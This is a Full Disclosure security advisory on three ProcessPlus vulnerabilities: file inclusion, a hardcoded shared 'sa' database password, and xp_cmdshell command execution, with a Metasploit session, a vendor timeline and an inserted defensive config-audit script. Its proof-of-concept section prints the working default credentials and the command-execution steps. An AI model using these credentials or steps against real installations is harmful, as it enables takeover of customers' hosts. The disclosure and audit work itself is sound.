[FD] CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
- From: Thomas Weber via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- Date: Mon, 22 Jul 2024 21:05:57 +0000
CyberDanube Security Research 20240722-0
title| Multiple Vulnerabilities
product| Perten Instruments Process Plus Software
vulnerable version| <=1.11.6507.0
fixed version| 2.0.0
CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913
impact| High
homepage| https://perkinelmer.com
found| 2024-04-24
by| S. Dietz, T. Weber (Office Vienna)
| CyberDanube Security Research
| Vienna | St. Pölten
| https://www.cyberdanube.com
Vendor description
"For 85 years, PerkinElmer has pushed the boundaries of science from food to
health to the environment. We’ve always pursued science with a clear purpose –
to help our customers achieve theirs. Our expert team brings technology and
intangibles, like creativity, empathy, diligence, and a spirit of
collaboration, in equal measure, to fulfill our customers’ desire to work
better, innovate better, and create better.
PerkinElmer is a leading, global provider of technology and service solutions
that help customers measure, quantify, detect, and report in ways that help
ensure the quality, safety, and satisfaction of their products."
Source: https://www.perkinelmer.com/
Vulnerable versions
ProcessPlus Software / <=1.11.6507.0
Vulnerability overview
1) Unauthenticated Local File Inclusion (CVE-2024-6911)
An LFI was identified in the web interface of the device. An attacker can use
this vulnerability to read system-wide files and configuration.
2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations.
In combination with 3), this allows an attacker to fully compromise the host.
3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user "sa" to connect to the database. Access to this
account allows an attacker to execute commands via the "xp_cmdshell" procedure.
Proof of Concept
1) Unauthenticated Local File Inclusion (CVE-2024-6911)
The LFI can be triggered by using the following GET Request:
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
This example returns the content from "C:\Windows\System32\drivers\etc\hosts"
of an affected installation.
2) Hardcoded MSSQL Credentials (CVE-2024-6912)
Analysis across multiple installations shows that the configuration file
"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:
<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"
appid="Perten.OPCDA.Server" loglevel="info"
These credentials "sa:enilno" were re-used in all reviewed installations.
3) Execution with Unnecessary Privileges (CVE-2024-6913)
The application uses the "sa" user to authenticate with the database. By using
Metasploit an attacker can execute arbitrary commands:
msf6 auxiliary(admin/mssql/mssql_exec) > show options
Module options (auxiliary/admin/mssql/mssql_exec):
Name Current Setting
---- ---------------
CMD dir
RPORT 1433
TECHNIQUE xp_cmdshell
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against
[*] - SQL Query: EXEC master..xp_cmdshell 'dir'
Directory of C:\Windows\system32
01/23/2024 13:37 AM <DIR> .
01/23/2024 13:37 AM <DIR> ..
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM 232 @AppHelpToast.png
01/23/2024 13:37 AM 308 @AudioToastIcon.png
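The two findings in 2) and 3) can be checked for on an installation without touching the database at all, by auditing the "dbconnectstring" attribute of OPCDA_SERVER.xml. The following audit script is an added example and not part of the advisory or the vendor's software; it assumes the XML element is well-formed (the fragment above is closed with a hypothetical "/>"), uses the login name and default password quoted above as indicators, and assumes that a Windows-authenticated connection ("Trusted_Connection=yes") is an acceptable hardened form.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the OPCDA_SERVER.xml fragment quoted above
# (closing "/>" is assumed; the advisory's excerpt is cut off there).
WEAK_XML = r"""<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1" appid="Perten.OPCDA.Server" loglevel="info" />"""

# Constructed hardened counterpart: dedicated login via Windows authentication,
# no plaintext secret in the file (assumes the product supports this form).
HARDENED_XML = r"""<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;DATABASE=ProcessPlus_OPC;Trusted_Connection=yes" application_id="1" appid="Perten.OPCDA.Server" loglevel="info" />"""

# Shared default password reported in CVE-2024-6912.
KNOWN_DEFAULT_PASSWORDS = {"enilno"}


def parse_connection_string(s):
    """Split an ODBC-style 'Key=Value;...' string into a dict keyed by upper-case name.
    Braced values such as Driver={SQL Server} may contain ';', so they are matched first."""
    return {k.strip().upper(): v.strip()
            for k, v in re.findall(r"([^;=]+)=(\{[^}]*\}|[^;]*)", s)}


def audit_opcda_config(xml_text):
    """Return a list of (tag, message) findings for one OPCDA_SERVER.xml document."""
    root = ET.fromstring(xml_text)
    params = parse_connection_string(root.get("dbconnectstring", ""))
    findings = []
    if params.get("UID", "").lower() == "sa":
        findings.append(("CVE-2024-6913",
                         "application connects as the 'sa' sysadmin login; "
                         "use a least-privilege login so xp_cmdshell is out of reach"))
    if params.get("PWD") in KNOWN_DEFAULT_PASSWORDS:
        findings.append(("CVE-2024-6912",
                         "known shared default password in use; rotate it in the "
                         "config file and in SQL Server"))
    elif "PWD" in params:
        findings.append(("plaintext-secret",
                         "database password stored in plaintext in the config file"))
    return findings


def audit_file(path):
    """Audit an on-disk config, e.g. \\ProgramData\\Perten\\ProcessPlus\\OPCDA_SERVER.xml."""
    with open(path, encoding="utf-8") as fh:
        return audit_opcda_config(fh.read())


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_XML), ("hardened", HARDENED_XML)):
        for tag, msg in audit_opcda_config(doc) or [("ok", "no findings")]:
            print(f"{name}: [{tag}] {msg}")
```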
Solution
Update to version 2.0.0.
Workaround
Restrict network access to the host with the installed software. Change the
default credentials of the database in the config file and the database itself.
Recommendation
CyberDanube recommends Perten customers to upgrade the software to the latest
version available and to restrict network access to the management interface.
Contact Timeline
2024-04-29: Contacting PerkinElmer via dpo@xxxxxxxxxxxxxxx.
2024-05-13: Vendor asked for unencrypted advisory.
2024-05-16: Sent advisory to vendor.
2024-05-22: Asked for status update. No answer.
2024-05-28: Asked for status update. Contact stated that they are working on a
2024-06-10: Asked for status update. Contact stated that all issues should be
fixed by end of month. Local file inclusion should be fixed in
version 1.16. Asked for a release date of version 1.16. No answer.
2024-07-13: Asked for status update.
2024-07-15: Contact stated that all three issues have been fixed in version
2.0.0, which was released on 2024-07-11.
2024-07-16: Asked for a link to the firmware update release.
2024-07-17: Set release date to 2024-07-22.
2024-07-22: Coordinated release of security advisory.
Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2024
Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/